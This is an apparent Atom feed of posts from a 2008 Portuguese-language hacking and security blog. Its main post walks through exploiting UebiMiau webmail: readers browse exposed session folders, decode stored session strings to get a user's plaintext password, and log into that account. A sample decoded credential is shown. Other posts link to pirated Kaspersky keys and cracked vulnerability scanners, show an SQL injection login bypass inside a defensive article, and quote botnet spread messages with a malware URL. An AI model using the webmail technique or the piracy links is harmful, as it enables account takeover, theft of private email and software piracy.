xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-3845774108769491345</id><published>2008-07-20T21:51:00.000-07:00</published><updated>2008-07-20T21:53:45.923-07:00</updated><title type='text'>UebiMiau 2.7.2</title><content type='html'>&lt;span style="font-size:78%;"&gt;&lt;span style="font-family:Comic Sans MS;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-size:100%;"&gt; Somente UebiMiau com versões menores que 2.7.2 estão vulneraveis.&lt;br /&gt;&lt;br /&gt;Seguinte... essa vulnerabilidade da acesso a path onde fica os arquivos de seção guardados, são arquivos temporários. Nesses arquivos contem dados das contas, são arquivos que são destruà*dos apos o usuário sair, mas acredito que pelo motivo dos usuários não saà*rem no link SAIR e sim no X ou mudam de site, esses arquivos continuem gravados na path.&lt;br /&gt;Apos você ter acesso a esses arquivos eles estarão criptografados, ai você terá que descriptografar, há fácil explicarei detalhes por detalhes.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="font-family:Comic Sans MS;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-size:100%;"&gt; Vira muitos sites do tipo. &lt;a href="http://www.exemplo.com.br/webmail/" target="_blank"&gt;www.exemplo.com.br/webmail/&lt;/a&gt;&lt;br /&gt;Segundo passo: Explorando os sites.&lt;br /&gt;Apos a pesquisa você achara sites do tipo&lt;br /&gt;&lt;a href="http://www.exemplo.com.br/webmail/" target="_blank"&gt;www.exemplo.com.br/webmail/&lt;/a&gt;&lt;br /&gt;acrescente /database/_sessions/ apos /webmail/&lt;br /&gt;ficara assim. &lt;a href="http://www.exemplo.com.br/webmail/database/_sessions/" target="_blank"&gt;www.exemplo.com.br/webmail/database/_sessions/&lt;/a&gt;&lt;br /&gt;Pronto se aparecer arquivos do tipo:&lt;br /&gt;{435B5077BE08A-435B5077C2FF1-1130057847}.usf&lt;br /&gt;O webmail esta vulnerabilidade, se caso não aparecer nada, (a pasta _sessions, vazia) há porque ninguhám cometeu aquele erro de não CLIKAR no SAIR pra destruir esse arquivo.&lt;br /&gt;*Mas esta vulnerabilidade, porem sem nenhum arquivo.&lt;br /&gt;Caso Aparecer Page Not Found... ou Sem autorização pra abrir a pasta, há porque não esta vulnerável.&lt;br /&gt;TERCEIRO PASSO: Descriptografar.&lt;br /&gt;Apos achar os arquivos *.usf abra-o e veras uma string do tipow:&lt;br /&gt;YTo1OntzOjU6ImVtYWlsIjtzOjIwOiJkbWdpdGFqYWlAZG1nLm  NvbS5iciI7czo&lt;br /&gt;0OiJ1c2VyIjtzOjk6ImRtZ2l0YWphaSI7czo0OiJwYXNzIjtzO  jY6Iml0YWphaSI&lt;br /&gt;7czo2OiJzZXJ2ZXIiO3M6Nzoid2VibWFpbCI7czo1OiJzdGFyd  CI7aToxMTI5OT&lt;br /&gt;M5MjQ3O30=&lt;br /&gt;Bom aqui ela esta criptografada, agora vamos descriptografa-la.&lt;br /&gt;Usamos o mIRC para executar essa proeza.&lt;br /&gt;no mIRC digite na linha de conversação.. (onde você usa pra conversar)&lt;br /&gt;//echo -a $decode(StringCriptografada, -m) e tecle enter.&lt;br /&gt;pronto o resultado vira na hora.&lt;br /&gt;*OBS: Não esqueça do // antes do echo, e do ,-m no final.&lt;br /&gt;*OBS: Não use strings muito grande pra descriptografar, pois o mirc ele limita caracteres... caso você colocar a string apos o $decode( e depois vc for acrescentar os ,-m) e cada tecla que pressionar você ouvir um BIP soar, há pq o limite foi atingido, então comece a deletar o final da st5ring criptografada.&lt;br /&gt;BLZ.. apos aparecer o resultado. que eh algo como:&lt;br /&gt;a:9:{s:5:"email";s:18:"richard@TESTE.COM.br";s:4:"  user";s:7:"richard";&lt;br /&gt;s:4:"pass";s:6:"999611";s:6:"server";s:4:"mail";s:  5:"start";i:1130057847;&lt;br /&gt;s:4:"auth";b:1;s:7:"folders";a:5:{i:0;a:1:{s:4:"na  me";s:5:"inbox";&lt;br /&gt;}i:1;a:1:{s:4:"name";s:5:"trash";}i:2;a:1:{s:4:"na  me";s:4:"sent";}i:3;&lt;br /&gt;a:1:{s:4:"name";s:8:"silvania";}i:4;&lt;br /&gt;você vai ter os seguintes dados necessários para login:&lt;br /&gt;USER: richard&lt;br /&gt;SENHA: 999611&lt;br /&gt;Agora há só voltar para a tela de login e se logar.&lt;br /&gt;Pronto.. você teve sucesso.&lt;br /&gt;Caso você saiba o LOGIN de algum usuário use&lt;br /&gt;&lt;a href="http://www.exemplo.com/database/user_domain/" target="_blank"&gt;http://www.exemplo.com/database/user_domain/&lt;/a&gt;&lt;br /&gt;Onde "user" há o usuário alvo e "domain" há o domà*nio alvo.&lt;br /&gt;Ai você entrara no "esqueleto" da conta do usuário, tendo acesso aos e-mails e tudo mais.&lt;br /&gt;&lt;br /&gt;By Dominiac&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-3845774108769491345?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/3845774108769491345/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=3845774108769491345' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3845774108769491345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3845774108769491345'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/uebimiau-272.html' title='UebiMiau 2.7.2'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-1886393180236771764</id><published>2008-07-16T08:29:00.000-07:00</published><updated>2008-07-16T08:32:14.942-07:00</updated><title type='text'>BSD UNIX Toolbox: 1000+ Commands for FreeBSD, OpenBSD</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i192.photobucket.com/albums/z18/virtualzin/eB/BSDUNIXToolbox1000plus.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 250px; height: 376px;" src="http://i192.photobucket.com/albums/z18/virtualzin/eB/BSDUNIXToolbox1000plus.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;1000+ Commands for FreeBSD, OpenBSD and NetBSD&lt;br /&gt;&lt;br /&gt;Autor: Christopher Negus and Francois Caen&lt;br /&gt;Páginas: 309 &lt;br /&gt;Publicado: Wiley (Maio 5, 2008)&lt;br /&gt;Linguagem: Ingles&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/123801472/BSD.UNIX.Toolbox.1000.plus.Commands.4.Free.BSD.Open.BSD.and.Net.BSD-virTuAlZin.rar"&gt;&lt;code&gt;http://rapidshare.com/files/123801472/BSD.UNIX.Toolbox.1000.plus.Commands.4.Free.BSD.Open.BSD.and.Net.BSD-virTuAlZin.rar&lt;/code&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-1886393180236771764?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/1886393180236771764/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=1886393180236771764' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1886393180236771764'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1886393180236771764'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/bsd-unix-toolbox-1000-commands-for.html' title='BSD UNIX Toolbox: 1000+ Commands for FreeBSD, OpenBSD'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-8899487920463089916</id><published>2008-07-16T05:33:00.000-07:00</published><updated>2008-07-16T05:36:21.207-07:00</updated><title type='text'>Vulnerability Scanner Pack</title><content type='html'>&lt;h3 style="color: rgb(0, 0, 0);" class="first"&gt;&lt;a href="http://www.h4cky0u.org/viewtopic.php?f=6&amp;amp;t=21558#p110726"&gt;&lt;/a&gt;Scanner's:&lt;br /&gt;&lt;/h3&gt;&lt;span style="font-size:100%;"&gt;- Core Impact 4&lt;br /&gt;- Acunetix Web Vulnerability Scanner 5&lt;br /&gt;- Nessus 3.6.0.1&lt;br /&gt;- GFI LANguard Network Security Scanner v8&lt;br /&gt;- Retina Network Security Scanner 5.15.7&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Info: &lt;/span&gt;&lt;br /&gt;Tamanho: 110MB&lt;br /&gt;Arquivo em RAR&lt;br /&gt;Hospedado em: xirror.com&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;a href="http://xirror.com/spread/39225260/Vulnerability.Scanners.part1.rar.html"&gt;http://xirror.com/spread/39225260/Vulnerability.Scanners.part1.rar.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://xirror.com/spread/39225260/Vulnerability.Scanners.part2.rar.html"&gt;http://xirror.com/spread/39225260/Vulnerability.Scanners.part2.rar.html&lt;/a&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-8899487920463089916?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/8899487920463089916/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=8899487920463089916' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8899487920463089916'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8899487920463089916'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/vulnerability-scanner-pack.html' title='Vulnerability Scanner Pack'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-3454867956611848630</id><published>2008-07-12T13:07:00.001-07:00</published><updated>2008-07-12T13:11:56.353-07:00</updated><title type='text'>Kaspersky KAS and KIS KEYS till 2009 &amp; 2010</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://pwimage.org/files/bg1z2azxqblic782o96r.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 252px; height: 346px;" src="http://pwimage.org/files/bg1z2azxqblic782o96r.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;1) Ir para ACTIVAÇÃO na Kaspersky .&lt;br /&gt;&lt;br /&gt;2) Clique APAGAR Chave. ( apenas se uma chave tem sido anteriormente instalado )&lt;br /&gt;&lt;br /&gt;3) Clique INSTALAR Chave.&lt;br /&gt;&lt;br /&gt;4) Após esta , Aplicar existindo licença chave.&lt;br /&gt;&lt;br /&gt;5) Seleccionar a chave que quizer fazer instalar.&lt;br /&gt;&lt;br /&gt;6) Enjoy ! xD~&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Download's:&lt;code&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar"&gt;http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar"&gt;http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar"&gt;http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar"&gt;http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar"&gt;http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar"&gt;http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;^^&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-3454867956611848630?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/3454867956611848630/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=3454867956611848630' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3454867956611848630'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/3454867956611848630'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/kaspersky-kas-and-kis-keys-till-2009.html' title='Kaspersky KAS and KIS KEYS till 2009 &amp; 2010'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-7792515875857920925</id><published>2008-07-12T13:04:00.000-07:00</published><updated>2008-07-12T13:07:32.882-07:00</updated><title type='text'>iptables-1.4.1.1</title><content type='html'>Descrição:&lt;br /&gt;O iptables é construido em cima do netfilter , e suas alteração são para o  Linux 2.4.x e 2.6.x. É um importante reescrever do seu antecessor ipchains , e é utilizado para controlo pacote filtragem , Network Address Translation ( masquerading, portforwarding, transparent proxying ), e efeitos especiais tais como pacote mutilar.&lt;br /&gt;&lt;br /&gt;Pagina: &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.iptables.org/"&gt;http://www.iptables.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;MD5 Checksum: 723fa88d8a0915e184f99e03e9bf06cb&lt;br /&gt;Download:&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/linux/firewall/iptables/iptables-1.4.1.1.tar.bz2"&gt;http://packetstormsecurity.org/linux/firewall/iptables/iptables-1.4.1.1.tar.bz2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- m --&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-7792515875857920925?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/7792515875857920925/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=7792515875857920925' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/7792515875857920925'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/7792515875857920925'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/iptables-1411.html' title='iptables-1.4.1.1'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-5483121295583880462</id><published>2008-06-30T09:56:00.000-07:00</published><updated>2008-06-30T10:12:28.510-07:00</updated><title type='text'>O mínimo que você deveria aprender para se defender de ataques de injeção de SQL no PostgreSQL</title><content type='html'>&lt;p&gt;&lt;a onclick="javascript:pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Sql_injection');" href="http://en.wikipedia.org/wiki/Sql_injection"&gt;SQL Injection&lt;/a&gt; ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;&lt;/li&gt;&lt;li&gt;O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.&lt;/li&gt;&lt;li&gt;O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;O exemplo clássico é o login de um usuário da aplicação. Você pede o nome e senha do usuário numa tela e depois envia um SQL com esta característica:&lt;/p&gt;  &lt;div style="font-weight: bold;" class="wp_syntax"&gt;&lt;div class="code"&gt;&lt;pre class="sql"&gt;&lt;span style="color: rgb(153, 51, 51);"&gt;SELECT&lt;/span&gt; TRUE &lt;span style="color: rgb(153, 51, 51);"&gt;WHERE&lt;/span&gt; nome &lt;span style="color: rgb(102, 204, 102);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;'telles'&lt;/span&gt; &lt;span style="color: rgb(153, 51, 51);"&gt;AND&lt;/span&gt; senha &lt;span style="color: rgb(102, 204, 102);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;'abizi'&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;  &lt;p&gt;Na tela de login o usuário pode digitar no lugar da senha algo mais ou menos assim:&lt;/p&gt; &lt;p&gt;USUÁRIO: admin&lt;br /&gt;SENHA: ‘ OR 1=1 –&lt;/p&gt; &lt;p&gt;Ao substituir as variáveis o seu SQL ficaria assim:&lt;/p&gt;  &lt;div style="font-weight: bold;" class="wp_syntax"&gt;&lt;div class="code"&gt;&lt;pre class="sql"&gt;&lt;span style="color: rgb(153, 51, 51);"&gt;SELECT&lt;/span&gt; TRUE &lt;span style="color: rgb(153, 51, 51);"&gt;WHERE&lt;/span&gt; nome &lt;span style="color: rgb(102, 204, 102);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;'admin'&lt;/span&gt; &lt;span style="color: rgb(153, 51, 51);"&gt;AND&lt;/span&gt; senha &lt;span style="color: rgb(102, 204, 102);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;''&lt;/span&gt; &lt;span style="color: rgb(153, 51, 51);"&gt;OR&lt;/span&gt; &lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;=&lt;/span&gt;&lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt; &lt;span style="color: rgb(128, 128, 128); font-style: italic;"&gt;--'&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;h2&gt;Segurança contra o SQL Injection&lt;/h2&gt; &lt;h4 style="font-weight: normal;"&gt;Regra no mínimo privilégio:&lt;/h4&gt; &lt;p style="font-weight: normal;"&gt;Veja que há uma série de problemas a serem analisados aqui. A primeira questão que qualquer sistema deve se preocupar em analisar é saber qual o potencial de destruição que o usuário vai ter se ele conseguir um ataque bem sucedido. Se o usuário que se conecta na aplicação é dono de objetos no banco de dados, como muitas aplicações gostam de fazer por uma questão de comodidade, você verá que o seu usuário terá permissões plenas sobre os seus objetos. Utilizando SQL Injection, ele poderá realizar operações como DROP, TRUNCATE, ALTER além do DELETE, INSERT, UPDATE e SELECT.&lt;/p&gt; &lt;p style="font-weight: normal;"&gt;Então a primeira regra que deve SEMPRE ser seguida a risca é que:&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;“O USUÁRIO QUE A APLICAÇÃO UTILIZA PARA SE CONECTAR NO BANCO DE DADOS JAMAIS DEVE SER O DONO DOS OBJETOS CRIADOS NO BANCO DE DADOS”&lt;/strong&gt;&lt;/p&gt; &lt;p style="font-weight: normal;"&gt;Alguns artigos que tratam sobre SQL Injection ignoram solenemente esta recomendação. Alguns ficam desempregados inesperadamente. Então, precauções especiais devem ser tomadas em aplicações onde cada usuário da aplicação não tem seu próprio usuário criado no banco de dados - o que é comum em aplicações web com milhares de usuários que surgem sem controle do DBA. Você deve ter pelo menos 4 usuários para cada aplicação com este perfil:&lt;/p&gt; &lt;ol style="font-weight: normal;"&gt;&lt;li&gt;Um usuário que é dono dos objetos criados no banco de dados. Este usuário deve estar sob controle somente e tão somente do DBA, tanto no ambiente de testes como em produção. Lembre-se que este usuário tem poderes plenos sobre estes objetos do banco de dados.&lt;/li&gt;&lt;li&gt;Um usuário ou grupo de usuários destinado aos desenvolvedores com poderes específicos para as suas tarefas. Pode-se determinar que no ambiente de produção ele tenha permissão de SELECT em todas tabelas e sequências e no ambiente de produção tenha poderes de SELECT, INSERT, UPDATE e DELETE.&lt;/li&gt;&lt;li&gt;Um usuário ou grupo de usuários destinado aos administradores da aplicação, que terão poderes específicos na aplicação como deletar registros ou atualizar valores em tabelas. Este usuário deve se conectar a partir de outro executável que não o utilizado pelos usuários normais. A aplicação utilizada para fins administrativos deve ter acesso restrito ao acesso local por exemplo. Este usuário terá permissões de DELETE, UPDATE e INSERT em tabelas que um usuário normal não terá permissão. Portanto, este usuário jamais deve ser utilizado em operações de rotina.&lt;/li&gt;&lt;li&gt;Um usuário para os usuários normais da aplicação. Este usuário deve seguir a risca a regra no menor privilégio. Ele deve apenas as permissões para acessar os objetos estritamente necessários. Privilégios de UPDATE e DELETE devem ser concedidos com muita cautela. Operações deste tipo quando executadas sem uma clausula WHERE adequada podem ser desatrosas. É este usuário que será alvo de ataques de SQL Injection. Se você for rigoroso com as permissões para este usuário, limitará muito a dimensão dos estragos que podem acontecer no caso de um ataque bem sucedido.&lt;/li&gt;&lt;/ol&gt;&lt;pre class="sql"&gt;Cya~&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-5483121295583880462?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/5483121295583880462/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=5483121295583880462' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5483121295583880462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5483121295583880462'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/o-mnimo-que-voc-deveria-aprender-para.html' title='O mínimo que você deveria aprender para se defender de ataques de injeção de SQL no PostgreSQL'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-6188321179189627120</id><published>2008-06-26T11:36:00.000-07:00</published><updated>2008-06-26T11:39:40.053-07:00</updated><title type='text'>Slackshow 2008</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.slackwarezine.com.br/imagens/banner-slackshow.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 471px; height: 60px;" src="http://www.slackwarezine.com.br/imagens/banner-slackshow.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pelo quarto ano consecutivo sera realizado em São Paulo o IV SlackShow, um evento voltado para tecnicos, com palestras tecnicas ministradas por tecnicos, &lt;strong class="destaque"&gt;*dias 22 e 23 de Agosto*&lt;/strong&gt;. Esse ano contamos com a presenca de palestrantes internacionais como Alan Hicks (autor do The Book, manual do slackware), Eric Hameleers (responsavel por boa parte da configuracao de rede, das novidades do instalador e outras coisas) e Robby Workman (HAL, pacotes do KDE4, etc). Todos eles participam ativamente do desenvolvimento da nossa distribuicao e sao comitters do Slackbuilds.org.  Ja estao confirmadas palestras sobre Perl, Desenvolvimento com XUL, Integracao com AD, Desenvolvimento do Slackware, Redes, etc. Esperamos contar com todos os fas de Slackware e quem gosta de software livre e tem sede de conhecimento.&lt;br /&gt;&lt;br /&gt;Escreva-se:&lt;br /&gt;http://slackshow.slackwarebrasil.org/?p=inscreva-se&lt;br /&gt;&lt;br /&gt;Cya&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-6188321179189627120?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/6188321179189627120/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=6188321179189627120' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/6188321179189627120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/6188321179189627120'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/pelo-quarto-ano-consecutivo-sera.html' title='Slackshow 2008'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-1018875422066297933</id><published>2008-06-25T09:55:00.000-07:00</published><updated>2008-06-25T09:56:51.416-07:00</updated><title type='text'>Site falso disfarçado como ImageShack distribui malware</title><content type='html'>&lt;p align="left"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;Criadores de malwares conseguiram desenvolver um site falso que imita o popular ImageShack, o quinto maior site de hospedagem de imagens da Internet, fazendo com que os usuários cliquem em links para imagens falsas infectando assim suas máquinas e espalhando-se através de programas de mensagens instantâneas.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;O ImageShack real é o &lt;strong&gt;imageshack.us&lt;/strong&gt;, entretanto, os autores de malwares estão utilizando o domínio &lt;strong&gt;imageshaack .org&lt;/strong&gt;, particularmente o &lt;strong&gt;imageshaack.org /img/Picture275.jpg&lt;/strong&gt;, que é onde está localizado o malware. Uma vez que a máquina do usuário esteja infectada com o malware Backdoor.Win32.SdBot.eiu, o host entra em um canal IRC onde os criadores da rede de bots continuam a enviar comandos para que o malware se espalhe, como abaixo:&lt;br /&gt;&lt;br /&gt;!msn.msg lool!! :D http ://imageshaack.org /img/Picture275.jpg  |!trition.msg lool!! :D http ://imageshaack.org/img /Picture275.jpg  topic set by Everglades on Wed Jun 11 15:41:57&lt;br /&gt;&lt;br /&gt;“!msn.msg Haha is that you;)? http ://imageshaack.org /img/Picture275.jpg?|!trition.msg http: //imageshaack.org/img /Picture275.jpg&lt;/span&gt;&lt;/p&gt;&lt;p align="left"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p align="left"&gt;&lt;span style="font-family:Tahoma;font-size:85%;"&gt;^^&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div 